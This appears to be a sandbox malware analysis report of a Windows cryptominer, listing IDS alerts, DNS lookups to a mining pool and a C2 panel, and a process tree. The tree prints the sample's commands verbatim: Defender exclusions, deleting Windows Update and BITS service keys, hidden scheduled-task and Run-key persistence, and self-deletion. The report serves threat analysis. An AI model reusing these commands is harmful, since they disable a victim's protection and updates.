                      11/02/22-12:58:39.057419 | UDP | 2036289 | ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro) | 56572 | 53 | 192.168.2.4 | 8.8.8.8
                      11/02/22-12:58:40.227957 | TCP | 2035420 | ET TROJAN Win32/Pripyat Activity (POST) | 49696 | 80 | 192.168.2.4 | 31.31.198.106
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Nov 2, 2022 12:58:39.057419062 CET | 56572 | 53 | 192.168.2.4 | 8.8.8.8
                      Nov 2, 2022 12:58:39.076940060 CET | 53 | 56572 | 8.8.8.8 | 192.168.2.4
                      Nov 2, 2022 12:58:40.100507021 CET | 50911 | 53 | 192.168.2.4 | 8.8.8.8
                      Nov 2, 2022 12:58:40.164290905 CET | 53 | 50911 | 8.8.8.8 | 192.168.2.4
                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                      Nov 2, 2022 12:58:39.057419062 CET | 192.168.2.4 | 8.8.8.8 | 0xe9e | Standard query (0) | pool.hashvault.pro | A (IP address) | IN (0x0001) | false
                      Nov 2, 2022 12:58:40.100507021 CET | 192.168.2.4 | 8.8.8.8 | 0xaadd | Standard query (0) | panel294756.site | A (IP address) | IN (0x0001) | false
                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                      Nov 2, 2022 12:58:39.076940060 CET | 8.8.8.8 | 192.168.2.4 | 0xe9e | No error (0) | pool.hashvault.pro |  | 199.247.19.116 | A (IP address) | IN (0x0001) | false
                      Nov 2, 2022 12:58:39.076940060 CET | 8.8.8.8 | 192.168.2.4 | 0xe9e | No error (0) | pool.hashvault.pro |  | 136.244.80.197 | A (IP address) | IN (0x0001) | false
                      Nov 2, 2022 12:58:40.164290905 CET | 8.8.8.8 | 192.168.2.4 | 0xaadd | No error (0) | panel294756.site |  | 31.31.198.106 | A (IP address) | IN (0x0001) | false


                      Target ID:0
                      Start time:12:56:29
                      Start date:02/11/2022
                      Path:C:\Users\user\Desktop\8iTXwpHCHb.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Users\user\Desktop\8iTXwpHCHb.exe
                      Imagebase:0x7ff6d2ea0000
                      File size:9861120 bytes
                      MD5 hash:E6001AAC5A3EE379149FD36BB6FB0D6F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low

                      Target ID:1
                      Start time:12:56:34
                      Start date:02/11/2022
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                      Imagebase:0x7ff71d940000
                      File size:447488 bytes
                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:high

                      Target ID:2
                      Start time:12:56:34
                      Start date:02/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c72c0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:4
                      Start time:12:56:49
                      Start date:02/11/2022
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                      Imagebase:0x7ff632260000
                      File size:273920 bytes
                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:5
                      Start time:12:56:49
                      Start date:02/11/2022
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                      Imagebase:0x7ff632260000
                      File size:273920 bytes
                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:6
                      Start time:12:56:49
                      Start date:02/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c72c0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:7
                      Start time:12:56:49
                      Start date:02/11/2022
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:powershell <#ujtstfzc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsAutHost' /tr '''C:\Program Files\WindowsServices\WindowsAutHost'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsServices\WindowsAutHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsAutHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsAutHost" /t REG_SZ /f /d 'C:\Program Files\WindowsServices\WindowsAutHost' }
                      Imagebase:0x7ff71d940000
                      File size:447488 bytes
                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:high

                      Target ID:8
                      Start time:12:56:49
                      Start date:02/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c72c0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:9
                      Start time:12:56:49
                      Start date:02/11/2022
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc stop UsoSvc
                      Imagebase:0x7ff61e220000
                      File size:69120 bytes
                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:10
                      Start time:12:56:49
                      Start date:02/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c72c0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:11
                      Start time:12:56:49
                      Start date:02/11/2022
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:powercfg /x -hibernate-timeout-ac 0
                      Imagebase:0x7ff7c72c0000
                      File size:94720 bytes
                      MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:12
                      Start time:12:56:49
                      Start date:02/11/2022
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc stop WaaSMedicSvc
                      Imagebase:0x7ff705650000
                      File size:69120 bytes
                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:13
                      Start time:12:56:50
                      Start date:02/11/2022
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:powercfg /x -hibernate-timeout-dc 0
                      Imagebase:0x7ff7d0850000
                      File size:94720 bytes
                      MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:14
                      Start time:12:56:50
                      Start date:02/11/2022
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc stop wuauserv
                      Imagebase:0x7ff705650000
                      File size:69120 bytes
                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:15
                      Start time:12:56:50
                      Start date:02/11/2022
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:powercfg /x -standby-timeout-ac 0
                      Imagebase:0x7ff7d0850000
                      File size:94720 bytes
                      MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:16
                      Start time:12:56:50
                      Start date:02/11/2022
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc stop bits
                      Imagebase:0x7ff705650000
                      File size:69120 bytes
                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:17
                      Start time:12:56:51
                      Start date:02/11/2022
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:powercfg /x -standby-timeout-dc 0
                      Imagebase:0x7ff7d0850000
                      File size:94720 bytes
                      MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:18
                      Start time:12:56:51
                      Start date:02/11/2022
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc stop dosvc
                      Imagebase:0x7ff705650000
                      File size:69120 bytes
                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:19
                      Start time:12:56:51
                      Start date:02/11/2022
                      Path:C:\Windows\System32\reg.exe
                      Wow64 process (32bit):false
                      Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                      Imagebase:0x7ff685e30000
                      File size:72704 bytes
                      MD5 hash:E3DACF0B31841FA02064B4457D44B357
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:20
                      Start time:12:56:52
                      Start date:02/11/2022
                      Path:C:\Windows\System32\reg.exe
                      Wow64 process (32bit):false
                      Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                      Imagebase:0x7ff685e30000
                      File size:72704 bytes
                      MD5 hash:E3DACF0B31841FA02064B4457D44B357
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:21
                      Start time:12:56:52
                      Start date:02/11/2022
                      Path:C:\Windows\System32\reg.exe
                      Wow64 process (32bit):false
                      Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                      Imagebase:0x7ff685e30000
                      File size:72704 bytes
                      MD5 hash:E3DACF0B31841FA02064B4457D44B357
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:22
                      Start time:12:56:53
                      Start date:02/11/2022
                      Path:C:\Windows\System32\reg.exe
                      Wow64 process (32bit):false
                      Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                      Imagebase:0x7ff685e30000
                      File size:72704 bytes
                      MD5 hash:E3DACF0B31841FA02064B4457D44B357
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:23
                      Start time:12:56:53
                      Start date:02/11/2022
                      Path:C:\Windows\System32\reg.exe
                      Wow64 process (32bit):false
                      Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                      Imagebase:0x7ff685e30000
                      File size:72704 bytes
                      MD5 hash:E3DACF0B31841FA02064B4457D44B357
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:26
                      Start time:12:57:20
                      Start date:02/11/2022
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:powershell <#agjywv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsAutHost" } Else { "C:\Program Files\WindowsServices\WindowsAutHost" }
                      Imagebase:0x7ff71d940000
                      File size:447488 bytes
                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET

                      Target ID:27
                      Start time:12:57:20
                      Start date:02/11/2022
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\8iTXwpHCHb.exe"
                      Imagebase:0x7ff632260000
                      File size:273920 bytes
                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:28
                      Start time:12:57:20
                      Start date:02/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c72c0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:29
                      Start time:12:57:21
                      Start date:02/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c72c0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:30
                      Start time:12:57:21
                      Start date:02/11/2022
                      Path:C:\Windows\System32\choice.exe
                      Wow64 process (32bit):false
                      Commandline:choice /C Y /N /D Y /T 3
                      Imagebase:0x7ff739310000
                      File size:33280 bytes
                      MD5 hash:EA29BC6BCB1EFCE9C9946C3602F3E754
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:31
                      Start time:12:57:30
                      Start date:02/11/2022
                      Path:C:\Windows\System32\schtasks.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\system32\schtasks.exe" /run /tn WindowsAutHost
                      Imagebase:0x7ff607080000
                      File size:226816 bytes
                      MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:32
                      Start time:12:57:30
                      Start date:02/11/2022
                      Path:C:\Program Files\WindowsServices\WindowsAutHost
                      Wow64 process (32bit):false
                      Commandline:C:\Program Files\WindowsServices\WindowsAutHost
                      Imagebase:0x7ff6208f0000
                      File size:9861121 bytes
                      MD5 hash:5B8C8BDDB55534C3C0DDA7CB094EEC00
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Antivirus matches:
                      • Detection: 100%, Avira
                      • Detection: 100%, Joe Sandbox ML

                      Target ID:33
                      Start time:12:57:51
                      Start date:02/11/2022
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                      Imagebase:0x7ff71d940000
                      File size:447488 bytes
                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET

                      Target ID:34
                      Start time:12:57:51
                      Start date:02/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c72c0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:35
                      Start time:12:57:55
                      Start date:02/11/2022
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                      Imagebase:0x7ff632260000
                      File size:273920 bytes
                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:36
                      Start time:12:57:55
                      Start date:02/11/2022
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                      Imagebase:0x7ff632260000
                      File size:273920 bytes
                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:37
                      Start time:12:57:55
                      Start date:02/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c72c0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:38
                      Start time:12:57:55
                      Start date:02/11/2022
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:powershell <#ujtstfzc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsAutHost' /tr '''C:\Program Files\WindowsServices\WindowsAutHost'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsServices\WindowsAutHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsAutHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsAutHost" /t REG_SZ /f /d 'C:\Program Files\WindowsServices\WindowsAutHost' }
                      Imagebase:0x7ff71d940000
                      File size:447488 bytes
                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET

                      Target ID:39
                      Start time:12:57:55
                      Start date:02/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c72c0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:40
                      Start time:12:57:56
                      Start date:02/11/2022
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc stop UsoSvc
                      Imagebase:0x7ff705650000
                      File size:69120 bytes
                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:41
                      Start time:12:57:56
                      Start date:02/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c72c0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:42
                      Start time:12:57:56
                      Start date:02/11/2022
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:powercfg /x -hibernate-timeout-ac 0
                      Imagebase:0x7ff7d0850000
                      File size:94720 bytes
                      MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:43
                      Start time:12:57:56
                      Start date:02/11/2022
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc stop WaaSMedicSvc
                      Imagebase:0x7ff705650000
                      File size:69120 bytes
                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:44
                      Start time:12:57:58
                      Start date:02/11/2022
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:powercfg /x -hibernate-timeout-dc 0
                      Imagebase:0x7ff7d0850000
                      File size:94720 bytes
                      MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:45
                      Start time:12:57:58
                      Start date:02/11/2022
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc stop wuauserv
                      Imagebase:0x7ff705650000
                      File size:69120 bytes
                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:46
                      Start time:12:57:58
                      Start date:02/11/2022
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:powercfg /x -standby-timeout-ac 0
                      Imagebase:0x7ff7d0850000
                      File size:94720 bytes
                      MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:47
                      Start time:12:57:58
                      Start date:02/11/2022
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc stop bits
                      Imagebase:0x7ff705650000
                      File size:69120 bytes
                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:48
                      Start time:12:57:59
                      Start date:02/11/2022
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:powercfg /x -standby-timeout-dc 0
                      Imagebase:0x7ff7d0850000
                      File size:94720 bytes
                      MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:49
                      Start time:12:57:59
                      Start date:02/11/2022
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc stop dosvc
                      Imagebase:0x7ff705650000
                      File size:69120 bytes
                      MD5 hash:D79784553A9410D15E04766AAAB77CD6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:50
                      Start time:12:57:59
                      Start date:02/11/2022
                      Path:C:\Windows\System32\reg.exe
                      Wow64 process (32bit):false
                      Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                      Imagebase:0x7ff685e30000
                      File size:72704 bytes
                      MD5 hash:E3DACF0B31841FA02064B4457D44B357
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:51
                      Start time:12:58:00
                      Start date:02/11/2022
                      Path:C:\Windows\System32\reg.exe
                      Wow64 process (32bit):false
                      Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                      Imagebase:0x7ff685e30000
                      File size:72704 bytes
                      MD5 hash:E3DACF0B31841FA02064B4457D44B357
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:52
                      Start time:12:58:01
                      Start date:02/11/2022
                      Path:C:\Windows\System32\reg.exe
                      Wow64 process (32bit):false
                      Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                      Imagebase:0x7ff685e30000
                      File size:72704 bytes
                      MD5 hash:E3DACF0B31841FA02064B4457D44B357
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:53
                      Start time:12:58:01
                      Start date:02/11/2022
                      Path:C:\Windows\System32\reg.exe
                      Wow64 process (32bit):false
                      Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                      Imagebase:0x7ff685e30000
                      File size:72704 bytes
                      MD5 hash:E3DACF0B31841FA02064B4457D44B357
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:54
                      Start time:12:58:02
                      Start date:02/11/2022
                      Path:C:\Windows\System32\reg.exe
                      Wow64 process (32bit):false
                      Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                      Imagebase:0x7ff685e30000
                      File size:72704 bytes
                      MD5 hash:E3DACF0B31841FA02064B4457D44B357
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:58
                      Start time:12:58:26
                      Start date:02/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe qeiyvjdhkxdq
                      Imagebase:0x7ff7c72c0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:59
                      Start time:12:58:29
                      Start date:02/11/2022
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                      Imagebase:0x7ff632260000
                      File size:273920 bytes
                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:60
                      Start time:12:58:29
                      Start date:02/11/2022
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                      Imagebase:0x7ff632260000
                      File size:273920 bytes
                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:61
                      Start time:12:58:29
                      Start date:02/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c72c0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:62
                      Start time:12:58:29
                      Start date:02/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c72c0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:63
                      Start time:12:58:30
                      Start date:02/11/2022
